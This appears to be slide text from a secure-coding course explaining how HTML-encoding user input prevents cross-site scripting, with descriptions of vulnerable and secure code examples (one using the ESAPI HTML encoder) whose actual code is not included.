- HTML encoding is used to protect unsafe output from attackers
- The variables found in an application should be validated and encoded before the output is sent to the HTML pages
- Converting JavaScript and HTML tags through encoding protects the code from cross-site scripting vulnerability
- User data that does not implement HTML encoding may result in markup injection
- HTML encoding is done by converting the html entities into encodings as “& lt;script& gt;", and is displayed as “<script>"
Vulnerable and Secure Code for HTML Encoding
Vulnerable Code
- The given code requests input from the user
- The code is executed correctly when the user gives valid input
- As there is no input validation, the code becomes vulnerable if the user enters invalid input
Secure Code
- The given code ensures HTML entities are encoded
- Each character is passed dynamically to the encoding function
Vulnerable Code
- The given code requests input from the user
- The code is executed correctly when the user gives valid input
- As there is no input validation, the code becomes vulnerable if the user enters invalid input
Secure Code
- The given code implements ESAPI.Encoder encode for HTML method to encode data to display as HTML
Cheng® 